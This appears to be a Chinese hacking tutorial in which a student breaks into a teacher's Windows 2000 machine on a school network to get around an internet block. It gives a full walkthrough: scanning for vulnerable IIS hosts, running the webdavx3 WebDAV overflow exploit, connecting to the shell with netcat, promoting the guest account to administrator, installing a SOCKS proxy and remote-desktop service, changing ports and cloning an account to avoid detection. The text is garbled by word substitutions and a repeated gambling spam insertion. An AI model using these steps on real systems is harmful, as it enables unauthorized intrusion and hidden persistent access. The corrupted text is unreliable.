冲破路由限度为所欲为上网冲浪






　　为了防备非典，学校履行关闭式治理，学校内外的网吧又全体封闭，原来学校的机房周六周日对外开放可以上网，现在学校一声令下也不许开。这可苦逝世了我们一帮网虫呀，好在为了不影响教养品质我们平时的上机试验仍是正常进行，我们学校那个机房联网方法是，教师和学活力分两个字网分辨是192.168.0.0和192.168.18.0为了方便文件共享2个网络通过win2000的软路由连接。我们平时上机时老师就对win2000的软路由进行限制。抛弃所有学生子网拜访外网的数据包，但2个子网之间可以畸形访问说到这里聪慧的友人已经晓得了怎么样打破了吧。对。只要我们访问外网的数据包都通过教师的机器转发，就可以解决问题了。因为路由以为我们是访问先生的机器，便让数据包通过而教师机再访问外网是不受制约的。原理并不难要害是怎么样在老师机器上装|代|理|泛亚娱乐|软件。总不能跑到教师办公室里和教师说吧！既然这样不行的话，我们就得用点非惯例手腕啦！因为现在webdavx溢出十分风行，所以我就用WebDAVScan对教师子网全方位扫描，果然不出我的所料。发现了2台。
　　
　　192.168.18.5 iis5.0 enable
　　192.168.18.18 iis5.0 enable
　　看来我的福气还是挺好的.接下来开端夺权吧
　　f:\>hacker\tools\webdavx3 192.168.18.5
　　IIS WebDAV overflow remote exploit by isnoxfocus.org
　　start to try offset,
　　if STOP a long time, you can press ^C and telnet 192.168.0.1 7788
　　try offset: 0
　　try offset: 1
　　waiting for iis restart.......................
　　try offset: 2
　　waiting for iis restart....................... (IIS reboot,just waiting...)
　　程序运行到这里停顿稍长时光,若停登时间比拟长而无反映,^C)
　　^C
　　f:\>hacker\tools\nc vv 192.168.18.5 7788
　　进入目的机c:\winnt\system32
　　现在嘛，我是老大我怕谁！
　　c:\net user guest /active:yes
　　c:\net localgroup administrators guest /add
　　把guest用户激活并晋升为管理员。
　　在本人的电脑上共享一个文件夹如 daili
　　c:\winnt\system32>copy \\192.168.0.10\daili\skserver.exe
　　已复制1个文件
　　c:\winnt\system32>copy \\192.168.0.10\daili\c3389.exe
　　已复制1个文件
　　c:\winnt\system32>copy \\192.168.0.10\daili\3389.exe
　　已复制1个文件
　　c:\winnt\system32>skserver install 安装skserver
　　Snake SockProxy Service installed.
　　c:\winnt\system32>skserver config port 4000 把默认端口改成4000
　　The Port value have set to 4000
　　c:\winnt\system32>skserver config starttype 2 把服务设定为主动启动
　　The New StartType have set to 2 Auto
　　c:\winnt\system32>net start skserver
　　Snake SockProxy Service 服务正在启动 .
　　Snake SockProxy Service 服务已经启动胜利.
　　好了，当初|代|理|泛亚娱乐|服务装置结束，我们可以把qq的sock5|代|理|泛亚娱乐|ip设为 192.168.0.5端口为4000怎么样上去了吧。想看网页呀，点qq的阅读器呀！如果呈现超时的提醒的话我们就要用到sockscap|代|理|泛亚娱乐|帽子了一路回车安装好sockscap后填上你做的|代|理|泛亚娱乐|服务器ip地址跟端口,并选者容许socks5|代|理|泛亚娱乐|，配置完毕当前会涌现一个主界面。把qq拖入空缺框里就能够了！如IE之类不能拖入的可以点击filenewbrowse选者你要|代|理|泛亚娱乐|的软件就可以了。假如你还想更多更便利的应用这个台机器的话咱们就要用到我上传的3389.exe和c3389.exe了3389.exe就是开启3389终端服务的工具只有直接履行3389.exe 等主机重启后你就可以用xp_ts连接上去了，如果你等不急想即时重启的话只要在加个参数 /r就可以了！c3389是我们用来改端口由于应用默认的3389端口的话容易被老师发现，而且还轻易被同行盗用。呵呵c3389的用法是直接打入c3389你要更改的端口, 回车就可以了 .等机重视启后你就可以登陆了，不外用xpts衔接的时候要用IP：端口来连接否者无奈登陆。比方我就要用192.168.18.5：5001来登陆。为了不让老师发明你可以用ca或pus更改注册表克隆一个帐,详细方式就不细说了。究竟我现在可以上网了。